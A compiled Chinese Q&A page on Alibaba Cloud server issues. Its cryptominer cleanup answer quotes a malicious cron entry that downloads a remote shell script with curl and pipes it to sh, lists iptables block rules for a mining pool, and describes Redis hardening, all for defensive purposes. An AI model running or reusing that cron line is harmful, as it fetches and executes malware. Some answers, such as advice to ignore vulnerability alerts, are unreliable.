1. 怎樣訪問阿里雲伺服器上的文件
通過ftp工具,比如filezilla軟體,連接上阿里雲伺服器後,就可以上傳下載文件了
2. 阿里雲伺服器檢測說有木馬,但具體是不是真的,請賜教。
看上去像是,因為我觀察到伺服器中木馬的一種同樣的現象,就是偽裝成所謂的正常文件來欺騙過用戶的眼睛。(例如圖中的 /etc/init.d/selinux這種與伺服器日常運行穩定不太相關的東西是被替換的高發文件)
同樣,圖中下面提到的/usr/bin/bsd-port 也並不是linux本來就有的東西(如果你沒有安裝過),這的確可疑。
趕緊上伺服器刪文件去吧,這確實是中木馬了。
3. 阿里雲伺服器怎麼看伺服器裡面的文件
windows可以遠程桌面連接啊,linux的話可以用ssh的方式登錄到linux伺服器上然後用ls的方式查看文件,用cd .. 或者 cd 目錄名字切換目錄。
4. 遠程連接阿里雲伺服器出現這個
這樣顯示是正常的。這是字元界面,輸入用戶和密碼就可以進入系統了
5. 我的阿里雲伺服器怎麼能保證安全不被人攻擊啊
防止阿里雲伺服器不被攻擊:
首先系統內部安全要做好,系統漏洞補丁要打好,防火牆的策略、開放那些埠訪問,允許那些IP訪問,這些基本的設置要做好。
使用一些專業的安全漏洞掃描工具,阿里雲自己有一個安全分析工具叫態勢感知,利用工具可以分析發現潛在的入侵和高隱蔽性攻擊威脅。
使用一些管理工具管理阿里雲主機,可以很方便的管理阿里雲主機,可以設置管理成員的許可權,防止管理混亂,減少對外埠開放,還附帶安全漏洞檢查。
遭遇到DDoS攻擊,需要購買第三方防DDoS攻擊的服務,阿里雲市場裡面有雲盾DDoS、東軟、伺服器安全加固及優化等一些防攻擊的產品。
6. 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
7. 請問阿里雲的伺服器出現了500異常怎麼解決
這個是伺服器錯誤,可以打官網的人工客服電話,然後讓他給你解決。一般是沒有大的問題的。
8. 網站被百度和阿里雲發現有非法信息,但是檢查伺服器後台沒有發現這類文件和文件夾
一般有非法信息,是你的文件或鏈接處有一些癮文件信息,所以你也不發現,所以要從新建立再試一下。
9. 阿里雲伺服器漏洞修復怎麼修復
這種提示我見過很多,基本上每個客戶都有這個提示,可以不用理會,你看看提示內容就知道了,都是系統的,你網站有後門被篡改跟這個關系不大,除非高危的,一般給別人處理安全問題都是程序問題比較多,你網站有安全問題可以找額給你解決,後面就不會被篡改了